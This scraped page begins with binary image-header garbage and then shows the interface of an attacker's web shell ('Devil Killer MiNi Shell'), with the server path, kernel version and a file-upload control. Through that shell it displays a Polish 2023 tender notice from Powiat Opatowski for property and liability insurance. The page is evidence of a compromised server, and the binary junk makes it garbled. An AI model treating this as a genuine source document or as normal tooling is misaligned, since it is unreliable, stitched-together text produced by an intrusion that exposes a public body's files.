JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230522/0022717501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowe ubezpieczenie mienia i odpowiedzialności cywilnej Powiatu Opatowskiego i jego jednostek organizacyjnych oraz instytucji kultury </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Opatowski</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Powiat Opatowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409212</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Henryka Sienkiewicza 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opatów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@opatow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.opatow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe ubezpieczenie mienia i odpowiedzialności cywilnej Powiatu Opatowskiego i jego jednostek organizacyjnych oraz instytucji kultury </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f66bd152-f895-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00227175</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00007205/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Kompleksowe ubezpieczenie mienia i odpowiedzialności cywilnej Powiatu Opatowskiego i jego jednostek organizacyjnych oraz instytucji kultury</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiatopatowski.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 2.	Zamawiający informuje, iż SWZ zawiera informacje o charakterze poufnym zawarte w załącznikach nr 6, 6A, 6B do SWZ oraz załącznikach nr 1-11 do opisu przedmiotu zamówienia. <br/>3.	Sposób dostępu do informacji poufnych oraz wymagania związane z ochroną poufnego charakteru informacji: <br/>3.1.	Zamawiający na podstawie art. 18 ust. 4 w zw. z art. 96 ust. 1 oraz art. 280 ust. 3 ustawy z dnia 11 września 2019 r. (Dz.U. z 2022 r., poz. 1710 ze zm.; dalej jako „ustawa Pzp”) udostępni opis przedmiotu zamówienia tym Wykonawcom, którzy bezpośrednio zwrócą się ze stosownym wnioskiem o udostępnienie informacji poufnych dotyczących mienia i działalności Powiatu Opatowskiego zamieszczonych w załącznikach nr 6, 6A, 6B do SWZ oraz załącznikach nr 1-11 do opisu przedmiotu zamówienia – Wzór wniosku o udostępnienie informacji poufnych - załącznik nr 5 do SWZ.<br/>3.2.	Informacje poufne, o których mowa w ust. 2, udostępniane będą wyłącznie podmiotom prowadzącym działalność ubezpieczeniową w świetle przepisów ustawy z dnia 11 września 2015r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j.: Dz.U. z 2023 r., poz. 656 ze zm.) - zwanej dalej „ustawą o działalności ubezpieczeniowej i reasekuracyjnej”.<br/>3.3.	Wykonawca zobowiązany jest przesłać wniosek w formie elektronicznej opatrzony kwalifikowanym podpisem elektronicznym, lub w postaci elektronicznej opatrzony podpisem zaufanym lub podpisem osobistym osoby uprawnionej do reprezentowania Wykonawcy poprzez Platformę, dostępną pod adresem: https://powiatopatowski.ezamawiajacy.pl/<br/>3.4.	Zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia o charakterze poufnym będą przesyłane poprzez Platformę, dostępną pod adresem: https://powiatopatowski.ezamawiajacy.pl/<br/>3.5.	Otrzymane w ten sposób informacje/załączniku przez Wykonawców nie mogą być udostępniane innym osobom i podmiotom oraz muszą służyć tylko i wyłącznie przygotowaniu oferty przez podmioty uprawione do wykonywania działalności ubezpieczeniowej. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiatopatowski.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy znajdującej się pod adresem: https://powiatopatowski.ezamawiajacy.pl/ w zakładce<br/>„Korespondencja”.<br/>2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>3. Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt 4;<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Nazwa Jednostkihttps://powiatopatowski.ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl.<br/>2) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie elektronicznej lub postaci elektronicznej.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury<br/>założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.<br/>4. Zamawiający, zgodnie z § 3 ust. 3 ww. Rozporządzenia określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę<br/>na Platformie Zakupowej tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.8. Zamawiający zgodnie z § 3 ust. 3 ww.<br/>Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods,<br/>odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,<br/>zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrek-tywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani /Pana danych jest Starosta Opatowski, z którym można się skontaktować korespondencyjnie na adres: ul. Henryka Sienkiewicza 17, 27-500 Opatów, email: powiat@opatow.pl lub Skrytka ePUAP: /itob629a04/SkrytkaESP lub telefonicz-nie tel. (15) 86 82 971 <br/>	Administrator powołał Inspektora Ochrony Danych Pana Roberta Bednarczyka, z którym można się kontaktować wysyłając e-mail na adres: rbednarczykrodo@interia.pl lub na adres Starostwa w Opatowie<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.); <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia lub na okres przechowywania tych danych zgodnie z wytycznymi o dofinansowania z środków UE;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana do-tyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiają-cy pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma za-stosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do dane-go administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/> o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie nie-zgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego za-łączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WI-II.272.9.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I zamówienia – ubezpieczenie mienia i odpowiedzialności cywilnej:<br/>A.	ubezpieczenie mienia od wszystkich ryzyk;<br/>B.	ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk;<br/>C.	ubezpieczenie odpowiedzialności cywilnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający na podstawie art. 441 ust. 1 ustawy Pzp, zastrzega sobie prawo do jednostronnego (w ramach opcji) rozszerzenia zamówienia do wysokości środków finansowych przyznanych na ten cel, w ramach poszczególnych części. W przypadku skorzystania z Opcji ochrona ubezpieczeniowa (program ubezpieczenia) będzie realizowana na warunkach w wskazanych w opisie przedmiotu zamówienia z uwzględnieniem zaakceptowanych fakultatywnych warunków ubezpieczenia.<br/>2.	Rodzaj i maksymalna wartość opcji. Przedmiotem opcji może być:<br/>2.1.	W CZĘŚCI I zamówienia:<br/>A.	ubezpieczenie mienia od wszystkich ryzyk maksymalnie do wysokości 10% wartości zamówienia podstawowego - ubezpieczenie ponad limit określony w klauzuli automatycznego pokrycia w każdym roku polisowym umowy 2 letniej;<br/>B.	ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk maksymalnie do wysokości 10% wartości zamówienia podstawowego - ubezpieczenie ponad limit określony w klauzuli automatycznego pokrycia w każdym roku polisowym umowy 2 letniej.<br/>2.3.	Ceny/stawki świadczenia usług w ramach Opcji nie ulegną zmianie w stosunku do określonych w Ofercie dla zamówienia podstawowego (formularz oferty – CZĘŚĆ I – załącznik 1A do SWZ).<br/>3.	Okoliczności skorzystania z opcji:<br/>3.1.	Faktyczne potrzeby Zamawiającego realizowane w ramach Opcji będą zgłaszane <br/>w trakcie obowiązywania umowy w związku z nabyciem środków trwałych, modernizacją/ ulepszeniem środków trwałych, oddaniem do użytku nowych inwestycji, umowami cywilno-prawnymi nakładającymi na Zamawiającego obowiązek ubezpieczenia.<br/>3.2.	Opcja będzie realizowana w oparciu o składki/stawki za poszczególne ryzyka ubezpieczeniowe, tj. rozumiane jako składki/stawki za 12-miesięczny okres ochrony ubezpieczeniowej, rozliczane w systemie pro rata temporis.<br/>3.3.	Zamawiający może złożyć jednostronne oświadczenie woli o wykonaniu Opcji, natomiast Wykonawca zobowiązany jest świadczyć usługi objęte Opcją.<br/>3.4.	Zamawiający gwarantuje jedynie wykonanie zamówienia podstawowego. <br/>3.5.	Wykonawcy nie przysługuje wobec Zamawiającego roszczenie o realizację zamówienia opcjonalnego:<br/>3.5.1.	niezłożenie zlecenia przez Zamawiającego oznacza rezygnację z Opcji. Wykonawcy przysługuje wówczas jedynie wynagrodzenie za realizację zamówienia podstawowego objętego przedmiotem zamówienia. <br/>3.5.2.	Wykonawca składając ofertę, wyraża zgodę na zawarcie Opcji w umowie. Wykonawca nie będzie wnosił oraz zrzeka się jakichkolwiek roszczeń z tytułu braku skorzystania przez Zamawiającego z Opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się niżej opisanym kryteriami i ich wagą:<br/>Kryterium	Waga<br/>Cena za zamówienie podstawowe oraz opcje	80%<br/>Fakultatywne warunki ubezpieczenia	20%<br/><br/>2.	Oferty będą oceniane w odniesieniu do warunków przedstawionych przez Wykonawców w zakresie każdego kryterium, wg następującego wzoru:<br/><br/> P = C + Wf <br/>gdzie:<br/>P	-	suma punktów, jakie Wykonawca uzyskał w poszczególnych kryteriach (Cena oferty za zamówienie podstawowe oraz opcje oraz fakultatywne warunki ubezpieczenia) z dokładnością do dwóch miejsc po przecinku, zgodnie z ogólnie przyjętymi zasadami matematyki;<br/>C - ilość punktów uzyskanych za kryterium cena za zamówienie podstawowe oraz opcje;<br/>Wf - ilość punktów uzyskanych za fakultatywne warunki ubezpieczenia.<br/><br/>2.1.	Ocena ofert w kryterium Cena za zamówienie podstawowe oraz opcje<br/> Cn<br/>C = ––––– x 100 x 80% <br/> Co<br/>gdzie:<br/>Cn	- cena najniższej oferty za zamówienie podstawowe oraz opcje;<br/>Co	- cena oferty ocenianej za zamówienie podstawowe oraz opcje.<br/><br/>2.2.	Ocena ofert w kryterium fakultatywne warunki ubezpieczenia<br/>Fakultatywne warunki ubezpieczenia podkryteria:<br/>	ubezpieczenie mienia od wszystkich ryzyk – 8%<br/>	ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk – 2%<br/>	ubezpieczenie odpowiedzialności cywilnej – 8%<br/>	klauzula funduszu prewencyjnego – 2%<br/><br/>Wf =(Xa x 8%) + (Xb x 2%) + (Xc x 8%) + (Xd x 2%) = max 20 pkt<br/>Przy czym:<br/>Xa – ilość uzyskanych punktów dla ubezpieczenia mienia od wszystkich ryzyk<br/>Xb – ilość uzyskanych punktów dla ubezpieczenia sprzętu elektronicznego od wszystkich ryzyk<br/>Xc – ilość uzyskanych punktów dla ubezpieczenia odpowiedzialności cywilnej<br/>Xd– ilość uzyskanych punktów dla klauzuli funduszu prewencyjnego<br/><br/>3.	Kryterium „Cena za zamówienie podstawowe oraz opcje” rozpatrywane będzie na podstawie ceny ofertowej dla CZĘŚCI I zamówienia za wykonanie zamówienia podstawowego oraz opcji za cały okres zamówienia podanej przez Wykonawcę w Formularzu ofertowym – CZĘŚĆ I zamówienia - załącznik nr 1A. Wykonawca, który przedstawi w Formularzu ofertowym najniższą cenę za wykonanie zamówienia podstawowego oraz opcji za cały okres zamówienia otrzyma maksymalnie 80 pkt.<br/>4.	Fakultatywne warunki ubezpieczenia zostały określone w formularzu ofertowym – CZĘŚĆ I zamówienia - załącznik nr 1A. Za akceptacje poszczególnych fakultatywnych warunków ubezpieczenia zostanie przyznana liczba punktów przypisana danemu fakultatywnemu warunkowi. Liczba punktów możliwa do uzyskania za akceptacje danego fakultatywnego warunku ubezpieczenia wskazana jest w formularzu ofertowym. Wykonawca może otrzymać w kryterium „Fakultatywne warunki ubezpieczenia” maksymalnie 20 pkt.<br/>5.	Zamawiający jako najkorzystniejszą ofertę uzna ofertę Wykonawcy, która uzyska najwyższą ilość punktów w ramach kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span 